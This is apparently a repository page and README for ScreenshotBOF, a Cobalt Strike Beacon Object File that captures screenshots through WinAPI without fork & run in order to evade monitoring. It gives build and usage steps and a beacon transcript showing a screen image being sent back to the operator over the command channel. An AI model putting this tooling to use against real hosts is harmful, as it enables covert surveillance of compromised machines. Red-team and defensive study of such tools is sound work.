Go to file
CodeXTF2 9bdc050f24 E 2022-12-09 02:07:57 +08:00
ScreenshotBOF E 2022-12-09 02:07:40 +08:00
bin/BOF E 2022-12-09 02:07:57 +08:00
.gitignore first commit 2022-10-23 16:58:24 +08:00
README.md Update README.md 2022-11-01 20:34:11 +08:00
ScreenshotBOF.sln first commit 2022-10-23 16:58:24 +08:00

README.md

ScreenshotBOF

An alternative screenshot capability for Cobalt Strike that uses WinAPI and does not perform a fork & run. Screenshot downloaded in memory.

Self Compilation

  1. git clone the repo
  2. open the solution in Visual Studio
  3. Build project BOF

Save methods:

  1. drop file to disk
  2. download file over beacon (Cobalt Strike only)

Usage

  1. import the screenshotBOF.cna script into Cobalt Strike
  2. use the command screenshot_bof {local filename} {save method 0/1}
beacon> screenshot_bof sad.bmp 1
[*] Running screenshot BOF by (@codex_tf2)
[+] host called home, sent: 5267 bytes
[+] received output:
[*] Screen saved to bitmap
[+] received output:
[*] Downloading bitmap over beacon with filename sad.bmp
[*] started download of sad.bmp
  1. if downloaded over beacon, BMP can be viewed in Cobalt Strike by right clicking the download and clicking "Render BMP" (credit @BinaryFaultline)

image

image

Notes

  • no evasion is performed, which should be fine since the WinAPIs used are not malicious

Why did I make this?

Cobalt Strike uses a technique known as fork & run for many of its post-ex capabilities, including the screenshot command. While this behaviour provides stability, it is now well known and heavily monitored for. This BOF is meant to provide a more OPSEC safe version of the screenshot capability.

Credits